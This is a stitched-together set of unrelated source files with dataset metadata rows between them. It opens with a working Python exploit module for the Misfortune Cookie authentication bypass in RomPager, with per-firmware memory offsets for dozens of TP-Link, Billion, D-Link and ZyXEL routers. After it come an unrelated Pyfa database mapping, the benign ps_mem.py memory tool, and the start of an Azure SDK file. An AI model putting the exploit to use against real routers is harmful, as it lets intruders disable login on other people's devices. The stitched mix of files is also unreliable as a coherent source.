# exploit based on Marcin Bury and Milad Doorbash routersploit module.
import core.Exploit
import interface.utils
from core.io import query_yes_no
from interface.messages import print_failed, print_success, print_warning, print_error, print_info, print_help
import requests
import requests.exceptions
import re
class Exploit(core.Exploit.RextExploit):
"""
Name:Misfortune Cookie vulnerability authentication bypass
File:misfortune_auth_bypass.py
Author:Ján Trenčanský
License: GNU GPL v3
Created: 4.2.2014
Description: PoC based on 31C3 presentation, exploit based on Marcin Bury and Milad Doorbash routersploit module.
Options:
Name Description
host Target host address
port Target port
model Target model
"""
devices = None
number = None
offset = None
def __init__(self):
# This part is directly taken from routersploit module
self.devices = [
# brand # model # firmware
{'name': "Azmoon AZ-D140W 2.11.89.0(RE2.C29)3.11.11.52_PMOFF.1", 'number': 107367693,
'offset': 13}, # 0x803D5A79 # tested
{'name': "Billion BiPAC 5102S Av2.7.0.23 (UE0.B1C)", 'number': 107369694, 'offset': 13},
# 0x8032204d # ----------
{'name': "Billion BiPAC 5102S Bv2.7.0.23 (UE0.B1C)", 'number': 107369694, 'offset': 13},
# 0x8032204d # ----------
{'name': "Billion BiPAC 5200 2.11.84.0(UE2.C2)3.11.11.6", 'number': 107369545,
'offset': 9}, # 0x803ec2ad # ----------
{'name': "Billion BiPAC 5200 2_11_62_2_ UE0.C2D_3_10_16_0", 'number': 107371218,
'offset': 21}, # 0x803c53e5 # ----------
{'name': "Billion BiPAC 5200A 2_10_5 _0(RE0.C2)3_6_0_0", 'number': 107366366,
'offset': 25}, # 0x8038a6e1 # ----------
{'name': "Billion BiPAC 5200A 2_11_38_0 (RE0.C29)3_10_5_0", 'number': 107371453,
'offset': 9}, # 0x803b3a51 # ----------
{'name': "Billion BiPAC 5200GR4 2.11.91.0(RE2.C29)3.11.11.52", 'number': 107367690,
'offset': 21}, # 0x803D8A51 # tested
{'name': "Billion BiPAC 5200SRD 2.10.5.0 (UE0.C2C) 3.6.0.0", 'number': 107368270,
'offset': 1}, # 0x8034b109 # ----------
{'name': "Billion BiPAC 5200SRD 2.12.17.0_UE2.C3_3.12.17.0", 'number': 107371378,
'offset': 37}, # 0x8040587d # ----------
{'name': "Billion BiPAC 5200SRD 2_11_62_2(UE0.C3D)3_11_11_22", 'number': 107371218,
'offset': 13}, # 0x803c49d5 # ----------
{'name': "D-Link DSL-2520U Z1 1.08 DSL-2520U_RT63261_Middle_East_ADSL",
'number': 107368902, 'offset': 25}, # 0x803fea01 # tested
{'name': "D-Link DSL-2600U Z1_DSL-2600U", 'number': 107366496, 'offset': 13},
# 0x8040637d # ----------
{'name': "D-Link DSL-2600U Z2_V1.08_ras", 'number': 107360133, 'offset': 20},
# 0x803389B0 # ----------
{'name': "TP-Link TD-8616 V2_080513", 'number': 107371483, 'offset': 21},
# 0x80397055 # ----------
{'name': "TP-Link TD-8816 V4_100528_Russia", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # ----------
{'name': "TP-Link TD-8816 V4_100524", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # ----------
{'name': "TP-Link TD-8816 V5_100528_Russia", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # ----------
{'name': "TP-Link TD-8816 V5_100524", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # tested
{'name': "TP-Link TD-8816 V5_100903", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # ----------
{'name': "TP-Link TD-8816 V6_100907", 'number': 107371426, 'offset': 17},
# 0x803c6e09 # ----------
{'name': "TP-Link TD-8816 V7_111103", 'number': 107371161, 'offset': 1},
# 0x803e1bd5 # ----------
{'name': "TP-Link TD-8816 V7_130204", 'number': 107370211, 'offset': 5},
# 0x80400c85 # ----------
{'name': "TP-Link TD-8817 V5_100524", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # ----------
{'name': "TP-Link TD-8817 V5_100702_TR", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # ----------
{'name': "TP-Link TD-8817 V5_100903", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # ----------
{'name': "TP-Link TD-8817 V6_100907", 'number': 107369788, 'offset': 1},
# 0x803b6e09 # ----------
{'name': "TP-Link TD-8817 V6_101221", 'number': 107369788, 'offset': 1},
# 0x803b6e09 # ----------
{'name': "TP-Link TD-8817 V7_110826", 'number': 107369522, 'offset': 25},
# 0x803d1bd5 # ----------
{'name': "TP-Link TD-8817 V7_130217", 'number': 107369316, 'offset': 21},
# 0x80407625 # ----------
{'name': "TP-Link TD-8817 V7_120509", 'number': 107369321, 'offset': 9},
# 0x803fbcc5 # tested
{'name': "TP-Link TD-8817 V8_140311", 'number': 107351277, 'offset': 20},
# 0x8024E148 # tested
{'name': "TP-Link TD-8820 V3_091223", 'number': 107369768, 'offset': 17},
# 0x80397E69 # tested
{'name': "TP-Link TD-8840T V1_080520", 'number': 107369845, 'offset': 5},
# 0x80387055 # ----------
{'name': "TP-Link TD-8840T V2_100525", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # tested
{'name': "TP-Link TD-8840T V2_100702_TR", 'number': 107369790, 'offset': 17},
# 0x803ae0b1 # ----------
{'name': "TP-Link TD-8840T V2_090609", 'number': 107369570, 'offset': 1},
# 0x803c65d5 # ----------
{'name': "TP-Link TD-8840T V3_101208", 'number': 107369766, 'offset': 17},
# 0x803c3e89 # tested
{'name': "TP-Link TD-8840T V3_110221", 'number': 107369764, 'offset': 5},
# 0x803d1a09 # ----------
{'name': "TP-Link TD-8840T V3_120531", 'number': 107369688, 'offset': 17},
# 0x803fed35 # ----------
{'name': "TP-Link TD-W8101G V1_090107", 'number': 107367772, 'offset': 37},
# 0x803bf701 # ----------
{'name': "TP-Link TD-W8101G V1_090107", 'number': 107367808, 'offset': 21},
# 0x803e5b6d # ----------
{'name': "TP-Link TD-W8101G V2_100819", 'number': 107367751, 'offset': 21},
# 0x803dc701 # ----------
{'name': "TP-Link TD-W8101G V2_101015_TR", 'number': 107367749, 'offset': 13},
# 0x803e1829 # ----------
{'name': "TP-Link TD-W8101G V2_101101", 'number': 107367749, 'offset': 13},
# 0x803e1829 # ----------
{'name': "TP-Link TD-W8101G V3_110119", 'number': 107367765, 'offset': 25},
# 0x804bb941 # ----------
{'name': "TP-Link TD-W8101G V3_120213", 'number': 107367052, 'offset': 25},
# 0x804e1ff9 # ----------
{'name': "TP-Link TD-W8101G V3_120604", 'number': 107365835, 'offset': 1},
# 0x804f16a9 # ----------
{'name': "TP-Link TD-W8151N V3_120530", 'number': 107353867, 'offset': 24},
# 0x8034F3A4 # tested
{'name': "TP-Link TD-W8901G V1_080522", 'number': 107367787, 'offset': 21},
# 0x803AB30D # tested
{'name': "TP-Link TD-W8901G V1,2_080522", 'number': 107368013, 'offset': 5},
# 0x803AB30D # ----------
{'name': "TP-Link TD-W8901G V2_090113_Turkish", 'number': 107368013, 'offset': 5},
# 0x803AB30D # ----------
{'name': "TP-Link TD-W8901G V3_140512", 'number': 107367854, 'offset': 9},
# 0x803cf335 # tested
{'name': "TP-Link TD-W8901G V3_100603", 'number': 107367751, 'offset': 21},
# 0x803DC701 # tested
{'name': "TP-Link TD-W8901G V3_100702_TR", 'number': 107367751, 'offset': 21},
# 0x803DC701 # tested
{'name': "TP-Link TD-W8901G V3_100901", 'number': 107367749, 'offset': 13},
# 0x803E1829 # tested
{'name': "TP-Link TD-W8901G V6_110119", 'number': 107367765, 'offset': 25},
# 0x804BB941 # tested
{'name': "TP-Link TD-W8901G V6_110915", 'number': 107367682, 'offset': 21},
# 0x804D7CB9 # tested
{'name': "TP-Link TD-W8901G V6_120418", 'number': 107365835, 'offset': 1},
# 0x804F16A9 # ----------
{'name': "TP-Link TD-W8901G V6_120213", 'number': 107367052, 'offset': 25},
# 0x804E1FF9 # ----------
{'name': "TP-Link TD-W8901GB V3_100727", 'number': 107367756, 'offset': 13},
# 0x803dfbe9 # ----------
{'name': "TP-Link TD-W8901GB V3_100820", 'number': 107369393, 'offset': 21},
# 0x803f1719 # ----------
{'name': "TP-Link TD-W8901N V1_111211", 'number': 107353880, 'offset': 0},
# 0x8034FF94 # tested
{'name': "TP-Link TD-W8951ND V1_101124,100723,100728", 'number': 107369839, 'offset': 25},
# 0x803d2d61 # tested
{'name': "TP-Link TD-W8951ND V1_110907", 'number': 107369876, 'offset': 13},
# 0x803d6ef9 # ----------
{'name': "TP-Link TD-W8951ND V1_111125", 'number': 107369876, 'offset': 13},
# 0x803d6ef9 # ----------
{'name': "TP-Link TD-W8951ND V3.0_110729_FI", 'number': 107366743, 'offset': 21},
# 0x804ef189 # ----------
{'name': "TP-Link TD-W8951ND V3_110721", 'number': 107366743, 'offset': 21},
# 0x804ee049 # ----------
{'name': "TP-Link TD-W8951ND V3_20110729_FI", 'number': 107366743, 'offset': 21},
# 0x804ef189 # ----------
{'name': "TP-Link TD-W8951ND V4_120511", 'number': 107364759, 'offset': 25},
# 0x80523979 # tested
{'name': "TP-Link TD-W8951ND V4_120607", 'number': 107364759, 'offset': 13},
# 0x80524A91 # tested
{'name': "TP-Link TD-W8951ND V4_120912_FL", 'number': 107364760, 'offset': 21},
# 0x80523859 # tested
{'name': "TP-Link TD-W8961NB V1_110107", 'number': 107369844, 'offset': 17},
# 0x803de3f1 # tested
{'name': "TP-Link TD-W8961NB V1_110519", 'number': 107369844, 'offset': 17},
# 0x803de3f1 # ----------
{'name': "TP-Link TD-W8961NB V2_120319", 'number': 107367629, 'offset': 21},
# 0x80531859 # ----------
{'name': "TP-Link TD-W8961NB V2_120823", 'number': 107366421, 'offset': 13},
# 0x80542e59 # ----------
{'name': "TP-Link TD-W8961ND V1_100722,101122", 'number': 107369839, 'offset': 25},
# 0x803D2D61 # tested
{'name': "TP-Link TD-W8961ND V1_101022_TR", 'number': 107369839, 'offset': 25},
# 0x803D2D61 # ----------
{'name': "TP-Link TD-W8961ND V1_111125", 'number': 107369876, 'offset': 13},
# 0x803D6EF9 # ----------
{'name': "TP-Link TD-W8961ND V2_120427", 'number': 107364732, 'offset': 25},
# 0x8052e0e9 # ----------
{'name': "TP-Link TD-W8961ND V2_120710_UK", 'number': 107364771, 'offset': 37},
# 0x80523AA9 # ----------
{'name': "TP-Link TD-W8961ND V2_120723_FI", 'number': 107364762, 'offset': 29},
# 0x8052B6B1 # ----------
{'name': "TP-Link TD-W8961ND V3_120524,120808", 'number': 107353880, 'offset': 0},
# 0x803605B4 # ----------
{'name': "TP-Link TD-W8961ND V3_120830", 'number': 107353414, 'offset': 36},
# 0x803605B4 # ----------
{'name': "ZyXEL P-660R-T3 3.40(BOQ.0)C0", 'number': 107369567, 'offset': 21},
# 0x803db071 # tested
{'name': "ZyXEL P-660RU-T3 3.40(BJR.0)C0", 'number': 107369567, 'offset': 21},
# 0x803db071
]
core.Exploit.RextExploit.__init__(self)
def do_list(self, e):
counter = 0
print_info("ID\tManufacturer\tModel\tFirmware")
for device in self.devices:
print_info("%d %s" % (counter, self.devices[counter]['name']))
counter += 1
def do_set(self, e):
args = e.split(' ')
try:
if args[0] == "host":
if interface.utils.validate_ipv4(args[1]):
self.host = args[1]
else:
print_error("Please provide valid IPv4 address")
elif args[0] == "port":
if str.isdigit(args[1]):
self.port = args[1]
else:
print_error("Port value must be integer")
elif args[0] == 'device':
if not str.isdigit(args[1]):
print_error("Invalid device ID")
elif int(args[1]) < 0 or int(args[1]) >= len(self.devices):
print_error("Invalid device ID")
else:
index = int(args[1])
print_info("Device: %s" % self.devices[index]['name'])
self.number = self.devices[index]['number']
print_info("Setting address to: %d" % self.number)
self.offset = self.devices[index]['offset']
print_info("Setting offset: %d" % self.offset)
except IndexError:
print_error("please specify value for variable")
def check(self):
user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
headers = {'User-Agent': user_agent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
'Connection': 'keep-alive',
'Accept-Encoding': 'gzip, deflate',
'Cache-Control': 'no-cache',
'Cookie': 'C107373883=/omg1337hax'}
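# Probe: request a non-existent page while sending the crafted C107373883 cookie; a vulnerable RomPager build reflects the cookie value ('omg1337hax') into the 404 body, which is what the checks below look for.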
target = 'http://' + self.host + ":" + self.port + '/blabla'
try:
response = requests.get(target, headers=headers, timeout=60)
if response.status_code != 404:
print_failed("Unexpected HTTP status, expecting 404 got: %d" % response.status_code)
print_warning("Device is not running RomPager")
else:
if 'server' in response.headers:
server = response.headers.get('server')
if re.search('RomPager', server) is not None:
print_success("Got RomPager! Server:%s" % server)
if re.search('omg1337hax', response.text) is not None:
print_success("Device is vulnerable to misfortune cookie")
return True
else:
print_failed("Test didn't pass.")
print_warning("Device MAY still be vulnerable")
return False
else:
print_failed("RomPager not detected, device is running: %s " % server)
return False
else:
print_failed("Not running RomPager")
return False
except requests.exceptions.Timeout:
print_error("Timeout!")
except requests.exceptions.ConnectionError:
print_error("No route to host")
def auth_bypass(self):
user_agent = 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)'
headers = {'User-Agent': user_agent,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-language': 'sk,cs;q=0.8,en-US;q=0.5,en;q,0.3',
'Connection': 'keep-alive',
'Accept-Encoding': 'gzip, deflate',
'Cache-Control': 'no-cache',
'Cookie': 'C' + str(self.number) + '=' + 'B' * self.offset + '\x00'}
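# The device-specific cookie number and padding length (taken from the device table above) aim RomPager's cookie write at the memory holding the authentication flag; the trailing NUL clears it so the web UI stops requiring credentials.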
target = 'http://' + self.host + ":" + self.port
try:
response = requests.get(target, headers=headers, timeout=60)
if response is not None and response.status_code <= 302:
print_success("Exploit sent, please check http://%s:%s authentication should be disabled"
% (self.host, self.port))
else:
print_error("Exploit failed")
except requests.exceptions.Timeout:
print_error("Timeout!")
except requests.exceptions.ConnectionError:
print_error("No route to host")
def do_run(self, e):
# First check with the same code as in misfortune cookie scanner
is_vulnerable = self.check()
if self.offset is None:
print_error("Please set device model by running set device id")
return
if is_vulnerable:
self.auth_bypass()
else:
if query_yes_no("Check indicates device is not vulnerable, would you like to try the exploit anyway?",
default="no"):
self.auth_bypass()
def help_list(self):
print_help("List all available devices")
Exploit()
| gpl-3.0 | 3,007,073,380,054,384,600 | 67.972727 | 120 | 0.39326 | false |
Ebag333/Pyfa | eos/db/gamedata/effect.py | 1 | 2320 | # ===============================================================================
# Copyright (C) 2010 Diego Duclos
#
# This file is part of eos.
#
# eos is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# eos is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with eos. If not, see <http://www.gnu.org/licenses/>.
# ===============================================================================
from sqlalchemy import Column, String, Integer, Boolean, Table, ForeignKey
from sqlalchemy.ext.associationproxy import association_proxy
from sqlalchemy.orm import mapper, synonym, relation, deferred
from eos.db import gamedata_meta
from eos.types import Effect, EffectInfo
typeeffects_table = Table("dgmtypeeffects", gamedata_meta,
Column("typeID", Integer, ForeignKey("invtypes.typeID"), primary_key=True, index=True),
Column("effectID", Integer, ForeignKey("dgmeffects.effectID"), primary_key=True))
effects_table = Table("dgmeffects", gamedata_meta,
Column("effectID", Integer, primary_key=True),
Column("effectName", String),
Column("description", String),
Column("published", Boolean),
Column("isAssistance", Boolean),
Column("isOffensive", Boolean))
mapper(EffectInfo, effects_table,
properties={"ID": synonym("effectID"),
"name": synonym("effectName"),
"description": deferred(effects_table.c.description)})
mapper(Effect, typeeffects_table,
properties={"ID": synonym("effectID"),
"info": relation(EffectInfo, lazy=False)})
Effect.name = association_proxy("info", "name")
Effect.description = association_proxy("info", "description")
Effect.published = association_proxy("info", "published")
| gpl-3.0 | -5,116,466,407,913,318,000 | 45.4 | 113 | 0.625 | false |
dwayne-randle-sr/various-snippets | centos/6/usr/local/bin/ps_mem.py | 1 | 17569 | #!/usr/bin/env python
# Try to determine how much RAM is currently being used per program.
# Note per _program_, not per process. So for example this script
# will report RAM used by all httpd process together. In detail it reports:
# sum(private RAM for program processes) + sum(Shared RAM for program processes)
# The shared RAM is problematic to calculate, and this script automatically
# selects the most accurate method available for your kernel.
# Licence: LGPLv2
# Author: [email protected]
# Source: http://www.pixelbeat.org/scripts/ps_mem.py
# V1.0 06 Jul 2005 Initial release
# V1.1 11 Aug 2006 root permission required for accuracy
# V1.2 08 Nov 2006 Add total to output
# Use KiB,MiB,... for units rather than K,M,...
# V1.3 22 Nov 2006 Ignore shared col from /proc/$pid/statm for
# 2.6 kernels up to and including 2.6.9.
# There it represented the total file backed extent
# V1.4 23 Nov 2006 Remove total from output as it's meaningless
# (the shared values overlap with other programs).
# Display the shared column. This extra info is
# useful, especially as it overlaps between programs.
# V1.5 26 Mar 2007 Remove redundant recursion from human()
# V1.6 05 Jun 2007 Also report number of processes with a given name.
# Patch from [email protected]
# V1.7 20 Sep 2007 Use PSS from /proc/$pid/smaps if available, which
# fixes some over-estimation and allows totalling.
# Enumerate the PIDs directly rather than using ps,
# which fixes the possible race between reading
# RSS with ps, and shared memory with this program.
# Also we can show non truncated command names.
# V1.8 28 Sep 2007 More accurate matching for stats in /proc/$pid/smaps
# as otherwise could match libraries causing a crash.
# Patch from [email protected]
# V1.9 20 Feb 2008 Fix invalid values reported when PSS is available.
# Reported by Andrey Borzenkov <[email protected]>
# V3.3 24 Jun 2014
# http://github.com/pixelb/scripts/commits/master/scripts/ps_mem.py
# Notes:
#
# All interpreted programs where the interpreter is started
# by the shell or with env, will be merged to the interpreter
# (as that's what's given to exec). For e.g. all python programs
# starting with "#!/usr/bin/env python" will be grouped under python.
# You can change this by using the full command line but that will
# have the undesirable effect of splitting up programs started with
# differing parameters (for e.g. mingetty tty[1-6]).
#
# For 2.6 kernels up to and including 2.6.13 and later 2.4 redhat kernels
# (rmap vm without smaps) it can not be accurately determined how many pages
# are shared between processes in general or within a program in our case:
# http://lkml.org/lkml/2005/7/6/250
# A warning is printed if overestimation is possible.
# In addition for 2.6 kernels up to 2.6.9 inclusive, the shared
# value in /proc/$pid/statm is the total file-backed extent of a process.
# We ignore that, introducing more overestimation, again printing a warning.
# Since kernel 2.6.23-rc8-mm1 PSS is available in smaps, which allows
# us to calculate a more accurate value for the total RAM used by programs.
#
# Programs that use CLONE_VM without CLONE_THREAD are discounted by assuming
# they're the only programs that have the same /proc/$PID/smaps file for
# each instance. This will fail if there are multiple real instances of a
# program that then use CLONE_VM without CLONE_THREAD, or if a clone changes
# its memory map while we're checksumming each /proc/$PID/smaps.
#
# I don't take account of memory allocated for a program
# by other programs. For e.g. memory used in the X server for
# a program could be determined, but is not.
#
# FreeBSD is supported if linprocfs is mounted at /compat/linux/proc/
# FreeBSD 8.0 supports up to a level of Linux 2.6.16
import getopt
import time
import errno
import os
import sys
try:
# md5 module is deprecated on python 2.6
# so try the newer hashlib first
import hashlib
md5_new = hashlib.md5
except ImportError:
import md5
md5_new = md5.new
# The following exits cleanly on Ctrl-C or EPIPE
# while treating other exceptions as before.
def std_exceptions(etype, value, tb):
sys.excepthook = sys.__excepthook__
if issubclass(etype, KeyboardInterrupt):
pass
elif issubclass(etype, IOError) and value.errno == errno.EPIPE:
pass
else:
sys.__excepthook__(etype, value, tb)
sys.excepthook = std_exceptions
#
# Define some global variables
#
PAGESIZE = os.sysconf("SC_PAGE_SIZE") / 1024 #KiB
our_pid = os.getpid()
have_pss = 0
class Proc:
def __init__(self):
uname = os.uname()
if uname[0] == "FreeBSD":
self.proc = '/compat/linux/proc'
else:
self.proc = '/proc'
def path(self, *args):
return os.path.join(self.proc, *(str(a) for a in args))
def open(self, *args):
try:
return open(self.path(*args))
except (IOError, OSError):
val = sys.exc_info()[1]
if (val.errno == errno.ENOENT or # kernel thread or process gone
val.errno == errno.EPERM):
raise LookupError
raise
proc = Proc()
#
# Functions
#
def parse_options():
try:
long_options = ['split-args', 'help', 'total']
opts, args = getopt.getopt(sys.argv[1:], "shtp:w:", long_options)
except getopt.GetoptError:
sys.stderr.write(help())
sys.exit(3)
# ps_mem.py options
split_args = False
pids_to_show = None
watch = None
only_total = False
for o, a in opts:
if o in ('-s', '--split-args'):
split_args = True
if o in ('-t', '--total'):
only_total = True
if o in ('-h', '--help'):
sys.stdout.write(help())
sys.exit(0)
if o in ('-p',):
try:
pids_to_show = [int(x) for x in a.split(',')]
except:
sys.stderr.write(help())
sys.exit(3)
if o in ('-w',):
try:
watch = int(a)
except:
sys.stderr.write(help())
sys.exit(3)
return (split_args, pids_to_show, watch, only_total)
def help():
help_msg = 'ps_mem.py - Show process memory usage\n'\
'\n'\
'-h Show this help\n'\
'-w <N> Measure and show process memory every N seconds\n'\
'-p <pid>[,pid2,...pidN] Only show memory usage PIDs in the specified list\n' \
'-s, --split-args Show and separate by, all command line arguments\n' \
'-t, --total Show only the total value\n'
return help_msg
#(major,minor,release)
def kernel_ver():
kv = proc.open('sys/kernel/osrelease').readline().split(".")[:3]
last = len(kv)
if last == 2:
kv.append('0')
last -= 1
while last > 0:
for char in "-_":
kv[last] = kv[last].split(char)[0]
try:
int(kv[last])
except:
kv[last] = 0
last -= 1
return (int(kv[0]), int(kv[1]), int(kv[2]))
#return Private,Shared
#Note shared is always a subset of rss (trs is not always)
def getMemStats(pid):
global have_pss
mem_id = pid #unique
Private_lines = []
Shared_lines = []
Pss_lines = []
Rss = (int(proc.open(pid, 'statm').readline().split()[1])
* PAGESIZE)
if os.path.exists(proc.path(pid, 'smaps')): #stat
digester = md5_new()
for line in proc.open(pid, 'smaps').readlines(): #open
# Note we checksum smaps as maps is usually but
# not always different for separate processes.
digester.update(line.encode('latin1'))
if line.startswith("Shared"):
Shared_lines.append(line)
elif line.startswith("Private"):
Private_lines.append(line)
elif line.startswith("Pss"):
have_pss = 1
Pss_lines.append(line)
mem_id = digester.hexdigest()
Shared = sum([int(line.split()[1]) for line in Shared_lines])
Private = sum([int(line.split()[1]) for line in Private_lines])
#Note Shared + Private = Rss above
#The Rss in smaps includes video card mem etc.
if have_pss:
pss_adjust = 0.5 # add 0.5 KiB as this is the average error due to truncation
Pss = sum([float(line.split()[1])+pss_adjust for line in Pss_lines])
Shared = Pss - Private
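# PSS already apportions shared pages between the processes mapping them, so subtracting the private pages leaves this process's share of the shared memory.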
elif (2,6,1) <= kernel_ver() <= (2,6,9):
Shared = 0 #lots of overestimation, but what can we do?
Private = Rss
else:
Shared = int(proc.open(pid, 'statm').readline().split()[2])
Shared *= PAGESIZE
Private = Rss - Shared
return (Private, Shared, mem_id)
def getCmdName(pid, split_args):
cmdline = proc.open(pid, 'cmdline').read().split("\0")
if cmdline[-1] == '' and len(cmdline) > 1:
cmdline = cmdline[:-1]
path = proc.path(pid, 'exe')
try:
path = os.readlink(path)
# Some symlink targets were seen to contain NULs on RHEL 5 at least
# https://github.com/pixelb/scripts/pull/10, so take string up to NUL
path = path.split('\0')[0]
except OSError:
val = sys.exc_info()[1]
if (val.errno == errno.ENOENT or # either kernel thread or process gone
val.errno == errno.EPERM):
raise LookupError
raise
if split_args:
return " ".join(cmdline)
if path.endswith(" (deleted)"):
path = path[:-10]
if os.path.exists(path):
path += " [updated]"
else:
#The path could be have prelink stuff so try cmdline
#which might have the full path present. This helped for:
#/usr/libexec/notification-area-applet.#prelink#.fX7LCT (deleted)
if os.path.exists(cmdline[0]):
path = cmdline[0] + " [updated]"
else:
path += " [deleted]"
exe = os.path.basename(path)
cmd = proc.open(pid, 'status').readline()[6:-1]
if exe.startswith(cmd):
cmd = exe #show non truncated version
#Note because we show the non truncated name
#one can have separated programs as follows:
#584.0 KiB + 1.0 MiB = 1.6 MiB mozilla-thunder (exe -> bash)
# 56.0 MiB + 22.2 MiB = 78.2 MiB mozilla-thunderbird-bin
return cmd
#The following matches "du -h" output
#see also human.py
def human(num, power="Ki"):
powers = ["Ki", "Mi", "Gi", "Ti"]
while num >= 1000: #4 digits
num /= 1024.0
power = powers[powers.index(power)+1]
return "%.1f %s" % (num, power)
def cmd_with_count(cmd, count):
if count > 1:
return "%s (%u)" % (cmd, count)
else:
return cmd
#Warn of possible inaccuracies
#2 = accurate & can total
#1 = accurate only considering each process in isolation
#0 = some shared mem not reported
#-1= all shared mem not reported
def shared_val_accuracy():
"""http://wiki.apache.org/spamassassin/TopSharedMemoryBug"""
kv = kernel_ver()
if kv[:2] == (2,4):
if proc.open('meminfo').read().find("Inact_") == -1:
return 1
return 0
elif kv[:2] == (2,6):
pid = os.getpid()
if os.path.exists(proc.path(pid, 'smaps')):
if proc.open(pid, 'smaps').read().find("Pss:")!=-1:
return 2
else:
return 1
if (2,6,1) <= kv <= (2,6,9):
return -1
return 0
elif kv[0] > 2:
return 2
else:
return 1
def show_shared_val_accuracy( possible_inacc, only_total=False ):
level = ("Warning","Error")[only_total]
if possible_inacc == -1:
sys.stderr.write(
"%s: Shared memory is not reported by this system.\n" % level
)
sys.stderr.write(
"Values reported will be too large, and totals are not reported\n"
)
elif possible_inacc == 0:
sys.stderr.write(
"%s: Shared memory is not reported accurately by this system.\n" % level
)
sys.stderr.write(
"Values reported could be too large, and totals are not reported\n"
)
elif possible_inacc == 1:
sys.stderr.write(
"%s: Shared memory is slightly over-estimated by this system\n"
"for each program, so totals are not reported.\n" % level
)
sys.stderr.close()
if only_total and possible_inacc != 2:
sys.exit(1)
def get_memory_usage( pids_to_show, split_args, include_self=False, only_self=False ):
cmds = {}
shareds = {}
mem_ids = {}
count = {}
for pid in os.listdir(proc.path('')):
if not pid.isdigit():
continue
pid = int(pid)
# Some filters
if only_self and pid != our_pid:
continue
if pid == our_pid and not include_self:
continue
if pids_to_show is not None and pid not in pids_to_show:
continue
try:
cmd = getCmdName(pid, split_args)
except LookupError:
#operation not permitted
#kernel threads don't have exe links or
#process gone
continue
try:
private, shared, mem_id = getMemStats(pid)
except RuntimeError:
continue #process gone
if shareds.get(cmd):
if have_pss: #add shared portion of PSS together
shareds[cmd] += shared
elif shareds[cmd] < shared: #just take largest shared val
shareds[cmd] = shared
else:
shareds[cmd] = shared
cmds[cmd] = cmds.setdefault(cmd, 0) + private
if cmd in count:
count[cmd] += 1
else:
count[cmd] = 1
mem_ids.setdefault(cmd, {}).update({mem_id:None})
#Add shared mem for each program
total = 0
for cmd in cmds:
cmd_count = count[cmd]
if len(mem_ids[cmd]) == 1 and cmd_count > 1:
# Assume this program is using CLONE_VM without CLONE_THREAD
# so only account for one of the processes
cmds[cmd] /= cmd_count
if have_pss:
shareds[cmd] /= cmd_count
cmds[cmd] = cmds[cmd] + shareds[cmd]
total += cmds[cmd] #valid if PSS available
sorted_cmds = sorted(cmds.items(), key=lambda x:x[1])
sorted_cmds = [x for x in sorted_cmds if x[1]]
return sorted_cmds, shareds, count, total
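# Shape of the values returned by get_memory_usage() (figures are invented,
# purely to illustrate the structure):
#   sorted_cmds -> [("sshd", 1040.5), ("firefox", 1800320.0)]  # per-program totals, ascending
#   shareds     -> {"sshd": 320.0, "firefox": 250000.0}        # shared portion per program
#   count       -> {"sshd": 2, "firefox": 1}                   # process count per program
#   total       -> 1801360.5                                   # grand total, meaningful with PSS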
def print_header():
sys.stdout.write(" Private + Shared = RAM used\tProgram\n\n")
def print_memory_usage(sorted_cmds, shareds, count, total):
for cmd in sorted_cmds:
sys.stdout.write("%8sB + %8sB = %8sB\t%s\n" %
(human(cmd[1]-shareds[cmd[0]]),
human(shareds[cmd[0]]), human(cmd[1]),
cmd_with_count(cmd[0], count[cmd[0]])))
if have_pss:
sys.stdout.write("%s\n%s%8sB\n%s\n" %
("-" * 33, " " * 24, human(total), "=" * 33))
def verify_environment():
if os.geteuid() != 0:
sys.stderr.write("Sorry, root permission required.\n")
if __name__ == '__main__':
sys.stderr.close()
sys.exit(1)
try:
kv = kernel_ver()
except (IOError, OSError):
val = sys.exc_info()[1]
if val.errno == errno.ENOENT:
sys.stderr.write(
"Couldn't access " + proc.path('') + "\n"
"Only GNU/Linux and FreeBSD (with linprocfs) are supported\n")
sys.exit(2)
else:
raise
if __name__ == '__main__':
verify_environment()
split_args, pids_to_show, watch, only_total = parse_options()
if not only_total:
print_header()
if watch is not None:
try:
sorted_cmds = True
while sorted_cmds:
sorted_cmds, shareds, count, total = get_memory_usage( pids_to_show, split_args )
if only_total and have_pss:
sys.stdout.write(human(total).replace(' ','')+'B\n')
elif not only_total:
print_memory_usage(sorted_cmds, shareds, count, total)
time.sleep(watch)
else:
sys.stdout.write('Process does not exist anymore.\n')
except KeyboardInterrupt:
pass
else:
# This is the default behavior
sorted_cmds, shareds, count, total = get_memory_usage( pids_to_show, split_args )
if only_total and have_pss:
sys.stdout.write(human(total).replace(' ','')+'B\n')
elif not only_total:
print_memory_usage(sorted_cmds, shareds, count, total)
# We must close explicitly, so that any EPIPE exception
# is handled by our excepthook, rather than the default
# one which is reenabled after this script finishes.
sys.stdout.close()
vm_accuracy = shared_val_accuracy()
show_shared_val_accuracy( vm_accuracy, only_total )
| gpl-3.0 | -8,928,246,836,031,157,000 | 34.855102 | 97 | 0.575047 | false |
Azure/azure-sdk-for-python | sdk/testbase/azure-mgmt-testbase/azure/mgmt/testbase/aio/operations/_test_summaries_operations.py | 1 | 9021 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
